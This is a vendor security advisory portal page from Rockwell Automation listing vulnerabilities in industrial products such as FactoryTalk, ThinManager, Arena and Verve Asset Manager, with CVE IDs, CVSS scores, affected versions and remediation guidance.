Loading

Rockwell Automation Security Advisories

We investigate all internally and externally reported security issues and publish security advisories for all validated security vulnerabilities. These advisories allow our customers and partners to assess the impact of the vulnerabilities and take appropriate action.
Have a Security Concern? SIGN UP FOR ALERTS VULNERABILITY POLICY

Welcome to the new Rockwell Automation Security Advisory portal. Click here to read more about our security advisory initiative.

We recently relocated all security advisories to this public-facing Security Advisory Portal, which is part of Rockwell Automation’s Trust Center. In the past, our security advisories were stored in the Rockwell Automation Knowledgebase and required authentication to obtain access. This new portal gives customers and partners easier access to advisories, which enables them to better manage the security posture of Rockwell Automation solutions.

Our new Security Advisory Portal includes search and filter functionality, enabling customers to more easily find advisories on their products. Security advisories now include Common Security Advisory Framework 2.0 (CSAF) content, a standard that supports automated security advisory ingestion and helps customers intake vulnerability management data faster. Our security advisories also include Known Exploited Vulnerability (KEV) data. The US Cybersecurity & Infrastructure Security Agency (CISA) maintains the authoritative source of vulnerabilities exploited in the wild and lists exploited vulnerabilities in the (KEV) catalog. We strongly encourage customers to use this information to prioritize remediation efforts within their vulnerability management processes.

These changes support our commitment to security and transparency. The legacy Industrial Security Advisory Index page in the Knowledgebase will remain accessible through mid-2024 to allow customers time to transition to the new portal. Customers will continue to receive email alerts based on their subscription preferences and can subscribe for alerts using the link on the Security Advisory portal.
Ordenar y filtrar
CloseClose
CloseClose

Filtrar y refinar

Mostrando
-
de
Resultados
SearchSearch
Ordenar por
Fecha de publicación
Fecha de la última actualización
CVSS Score
SearchSearch
Producto
SearchSearch
Known Exploited Vulnerability (KEV)
Corrected
Workaround
Products Affected
SearchSearch
Filtrar resultados
Mostrando
-
de
Resultados
Critical
SD1728 | Apache Vulnerability in FactoryTalk® Historian-ThingWorx Connection Server
Published Date:
May 14, 2025
Last Updated:
May 14, 2025
CVE IDs:
CVE-2018-1285
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 5/15/2025

Last updated: 5/15/2025

Revision Number: 1.0

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

95057C-FTHTWXCT11

<= v4.02.00

v5.00.00 and later

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2018-1285

A vulnerability has been identified in the third-party Apache log4net software, impacting the FactoryTalk® Historian-ThingWorx Connector. This issue arises because versions of Apache log4net prior to 2.0.10 fail to disable XML external entities during the parsing of log4net configuration files. Consequently, a threat actor could exploit this to launch XX-based attacks on applications that accept malicious log4net configuration files.

 

CVSS 3.1 Base Score: 9.8

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: no

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Update to the corrected version if possible. Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

·         Security Best Practices

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

 

High
SD1727 | Local Privilege Escalation and denial-of-service Vulnerability in ThinManager®
Published Date:
April 15, 2025
Last Updated:
April 23, 2025
CVE IDs:
CVE-2025-3617 , CVE-2025-3618
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

First Known in Software Version

Corrected in Software Version

Software - ThinManager

CVE-2025-3617

14.0.0 & 14.0.1

v14.0.2 and later

Software - ThinManager

CVE-2025-3618

v14.0.1 and earlier

v11.2.11, 12.0.9, 12.1.10, 13.0.7, 13.1.5, 13.2.4, 14.0.2 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Zero Day Initiative (ZDI).

CVE-2025-3617 IMPACT

A privilege escalation vulnerability exists in the affected product. When the software starts up, files are deleted in the temporary folder causing the Access Control Entry of the directory to inherit permissions from the parent directory. If exploited, a threat actor could inherit elevated privileges.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: 276 - Incorrect Default Permissions
Known Exploited Vulnerability (KEV) database: No

CVE-2025-3618 IMPACT

A denial-of-service vulnerability exists in the affected product. The software fails to adequately verify the outcome of memory allocation while processing Type 18 messages. If exploited, a threat actor could cause a denial-of-service on the target software.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE:  119 - Improper Restriction of Operations within the Bounds of a Memory Buffer
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1726 | Local Code Execution Vulnerabilities in Arena®
Published Date:
April 07, 2025
Last Updated:
April 07, 2025
CVE IDs:
CVE-2025-2285, CVE-2025-2286, CVE-2025-2287, CVE-2025-2288, CVE-2025-2293, CVE-2025-2829, CVE-2025-3285, CVE-2025-3286, CVE-2025-3287, CVE-2025-3288, CVE-2025-3289
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 4/8/2025

Last updated: 4/8/2025

Revision Number: 1.0

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

Arena®

16.20.08 and earlier

16.20.09

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Michael Heinzl.

CVE-2025-2285

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is result of improper validation of user-supplied data.  If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE- 457 Uninitialized Variable

 

CVE-2025-2286

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is result of improper validation of user-supplied data.  If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE- 457 Uninitialized Variable

 

 

CVE-2025-2287

A local code execution vulnerability exists in the affected products due to an uninitialized pointer. The flaw is result of improper validation of user-supplied data.  If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE- 457 Uninitialized Variable

 

CVE-2025-2288

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data.   If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector:CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE 787 - Out of Bounds Write

 

CVE-2025-2293

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data.   If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE 787 - Out of Bounds Write

 

CVE-2025-2829

A local code execution vulnerability exists in the affected products due to a threat actor being able to write outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data.   If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE 787 - Out of Bounds Write

 

CVE-2025-3285

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is a result of improper validation of user-supplied data.  If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE-125 Out of Bounds Read

 

CVE-2025-3286

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data.  If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE-125 Out of Bounds Read

 

CVE-2025-3287

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data.  If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE-125 Out of Bounds Read

 

CVE-2025-3288

A local code execution vulnerability exists in the affected products due to a threat actor being able to read outside of the allocated memory buffer. The flaw is result of improper validation of user-supplied data.  If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE-125 Out of Bounds Read

 

 

CVE-2025-3289

A local code execution vulnerability exists in the affected products due to a stack-based memory buffer overflow. The flaw is result of improper validation of user-supplied data. If exploited a threat actor can disclose information and execute arbitrary code on the system. To exploit the vulnerability a legitimate user must open a malicious DOE file.

CVSS 3.1 Base Score: 7.8

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 8.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  No

CWE: CWE 121 – Stack-based Buffer Overflow

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

·         Security Best Practices

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

 

High
SD1725 | Third-party Local Code Execution Vulnerability in 440G TLS-Z
Published Date:
March 24, 2025
Last Updated:
March 24, 2025
CVE IDs:
CVE 2020-27212
Products:
440G TLS-Z
CVSS Scores (v3.1):
7.0
CVSS Scores (v4.0):
7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: 3/25/2025

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Versions

Corrected in Software Version

440G TLS-Z

v6.001

n/a – see mitigations

 

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Limit physical access to authorized personnel: Control room, cells/areas, control panels, and devices. See Chapter 4, Harden the Control System of System Security Design Guidelines

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE 2020-27212 IMPACT

A local code execution vulnerability exists in the STMicroelectronics STM32L4 devices due to having incorrect access controls. The affected product utilizes the STMicroelectronics STM32L4 device and because of the vulnerability, a threat actor could reverse protections that control access to the JTAG interface. If exploited, a threat actor can take over the device.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

CWE:1395-Dependency of a third-party Component & CWE 74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

 

CPE: cpe:2.3:h:st:stm32l431rc:-:*:*:*:*:*:*:*


Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1724 | Lifecycle Services with Veeam Backup and Replication are Vulnerable to third-party Vulnerabilities
Published Date:
March 21, 2025
Last Updated:
March 21, 2025
CVE IDs:
CVE-2025-23120
CVSS Scores (v3.1):
9.9
CVSS Scores (v4.0):
9.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Lifecycle Services with Veeam Backup and Replication are Vulnerable to third-party Vulnerabilities

Published Date: 03/21/25

Last updated: 03/27/25

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Versions

Corrected in Software Revision

Industrial Data Center (IDC) with Veeam

Generations 1 – 5

Refer to Remediation and Workarounds

VersaVirtual™ Appliance (VVA) with Veeam

Series A - C

Refer to Remediation and Workarounds

REMEDIATIONS AND WORKAROUNDS

Users with an active Rockwell Automation Infrastructure Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts. 

Users without Rockwell Automation managed services contract, refer to Veeam’s advisories below:

·         Support Content Notification - Support Portal – Veeam support portal

·         https://www.veeam.com/kb4724

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

·         Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-23120

A remote code execution vulnerability exists in Veeam Backup & Replication, which the affected products use. Exploitation of the vulnerability can allow a threat actor to execute code on the target system.

CVSS 3.1 Base Score: 9.9

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database:   No

 

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

Critical
SD1723 | Admin Shell Access Vulnerability in Verve Asset Manager
Published Date:
March 20, 2025
Last Updated:
March 20, 2025
CVE IDs:
CVE-2025-1449
CVSS Scores (v3.1):
9.1
CVSS Scores (v4.0):
8.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 3/25/25

Revision Number: 1.0

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

Affected Version(s)

 

 

 

 

Corrected in Software Revision 

 

 

 

 

Verve Asset Manager 

 

 

 

 

<=1.39

 

 

 

 

V1.40

 

 

 

VULNERABILITY DETAILS 

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-1449 IMPACT

A vulnerability exists in the affected product due to insufficient variable sanitizing. A portion of the administrative web interface for Verve's Legacy Agentless Device Inventory (ADI) capability (deprecated since the 1.36 release) allows users to change a variable with inadequate sanitizing. If exploited, it could allow a threat actor with administrative access to run arbitrary commands in the context of the container running the service. 

CVSS Base Score v3.1: 9.1

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

 

CVSS Base Score v4.0: 8.9

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE: CWE-1287: Improper Validation of Specified Type of Input

 

Known Exploited Vulnerability (KEV) database:  No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

 

Mitigations and Workarounds 

Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

Critical
SD1722 | Lifecycle Services with VMware are Vulnerable to third-party Vulnerabilities
Published Date:
March 07, 2025
Last Updated:
March 07, 2025
CVE IDs:
CVE-2025-22224, CVE-2025-22225, CVE-2025-22226
CVSS Scores (v3.1):
9.3, 8.2, 7.1
CVSS Scores (v4.0):
9.4, 9.3, 8..2
Known Exploited Vulnerability (KEV):
Yes
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found through a third-party advisory and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Versions

Corrected in software version

Industrial Data Center (IDC) with VMware

Generations 1 – 4

Refer to Mitigations and Workarounds

VersaVirtual™ Appliance (VVA) with VMware

Series A & B

Refer to Mitigations and Workarounds

Threat Detection Managed Services (TDMS) with VMware

All

Refer to Mitigations and Workarounds

 

Endpoint Protection Service with RA Proxy & VMware only

All

Refer to Mitigations and Workarounds

 

Engineered and Integrated Solutions with VMware 

All

Refer to Broadcom’s advisory

 

 

Remediations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract or Threat Detection Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without Rockwell Automation managed services contract, refer to Broadcom’s advisories below:

·         Support Content Notification - Support Portal - Broadcom support portal

·         https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u3d-release-notes.html

·         https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/8-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-80u2d-release-notes.html

·         https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/release-notes/esxi-update-and-patch-release-notes/vsphere-esxi-70u3s-release-notes.html

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

·         Security Best Practices

 

VULNERABILITY DETAILS

Rockwell Automation used v3.1 and v4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-22224

A Time of Check Time of use (TOCTOU) vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with local administrative privileges to execute code as the virtual machine's VMX process running on the host.

CVSS 3.1 Base Score: 9.3

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 9.4

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database:  Yes

 

CVE-2025-22225

A code execution vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with privileges within the VMX process trigger an arbitrary kernel write, leading to an escape of the sandbox.

CVSS 3.1 Base Score: 8.2

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

 

CVSS 4.0 Base Score: 9.3

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Known Exploited Vulnerability (KEV) database:  Yes

 

CVE-2025-22226

An out of bounds vulnerability exists in VMware ESXi, which the affected products use. Exploitation of the vulnerability can allow a threat actor with administrative privileges to leak memory from the vmx process. 

CVSS 3.1 Base Score: 7.1

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

 

CVSS 4.0 Base Score: 8.2

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Known Exploited Vulnerability (KEV) database:  Yes

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

 

Critical
SD1721 | FactoryTalk® AssetCentre Multiple Vulnerabilities
Published Date:
January 29, 2025
Last Updated:
January 29, 2025
CVE IDs:
CVE-2025-0477 , CVE-2025-0497, CVE-2025-0498
CVSS Scores (v3.1):
9.8, 7.0, 7.8
CVSS Scores (v4.0):
9.3, 7.3, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Versions

Corrected Version

FactoryTalk® AssetCentre

CVE-2025-0477

All prior to V15.00.001


V15.00.01 and later

CVE-2025-0497

V11, V12, and V13 (patch available)

V15.00.01 and later

CVE-2025-0498


V11, V12, and V13 (patch available)

V15.00.01 and later

 

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

For CVE-2025-0477:

o   Update FactoryTalk® AssetCentre to v15.00.01 or later.

o   The encrypted data is stored in a table in the database. Control access to the database by non-essential users.

For CVE-2025-0497

o   Update FactoryTalk® AssetCentre to v15.00.01 or later.

o   Apply patches to correct legacy versions:

§  To apply the patch for LogCleanUp or ArchiveLogCleanUp download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later

§  To apply patches for EventLogAttachmentExtractor or ArchiveExtractor, locate the article BF31148, download the patch files and follow the instructions.

o   Restrict physical access to the machine to authorized users.

For CVE-2025-0498

o   Update FactoryTalk® AssetCentre to v15.00.01 or later.

o   Apply patches to correct legacy versions:

§  To apply the patch for download and install the Rockwell Automation January 2025 Monthly Patch rollup, or later

o   Restrict physical access to the machine to authorized users.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

VULNERABILITY DETAILS

CVE-2025-0477 and CVE-2025-0497 reported to Rockwell Automation by Nestlé - Alban Avdiji. CVE-2025-0498 was found internally by Rockwell Automation during routine testing. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-0477 IMPACT

An encryption vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to a weak encryption methodology and could allow a threat actor to extract passwords belonging to other users of the application.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-326: Inadequate Encryption Strength
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0497 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to storing credentials in the configuration file of EventLogAttachmentExtractor, ArchiveExtractor, LogCleanUp, or ArchiveLogCleanUp packages.

CVSS 3.1 Base Score: 7.0
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

CVE-2025-0498 IMPACT

A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk® AssetCentre. The vulnerability exists due to insecure storage of FactoryTalk® Security user tokens, which could allow a threat actor to steal a token and, impersonate another user.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-522: Insufficiently Protected Credentials
Known Exploited Vulnerability (KEV) database: No

Critical
SD1715 | Path Traversal and Third-party Vulnerability in DataMosaix™ Private Cloud
Published Date:
January 28, 2025
Last Updated:
January 28, 2025
CVE IDs:
CVE-2025-0659, CVE-2020-11656
CVSS Scores (v3.1):
5.5, 9.8
CVSS Scores (v4.0):
7.0, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

Affected Software Version

Corrected in Software Version

DataEdgePlatform DataMosaix™ Private Cloud

CVE-2025-0659

<=7.11

7.11.01

DataEdgePlatform DataMosaix™ Private Cloud

CVE-2020-11656 

<=7.09

7.11.01

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

 CVE-2025-0659 IMPACT

A path traversal vulnerability exists in the affected product. By specifying the character sequence in the body of the vulnerable endpoint, it is possible to overwrite files outside of the intended directory. A threat actor with admin privileges could leverage this vulnerability to overwrite reports including user projects.

CVSS 3.1 Base Score: 5.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N

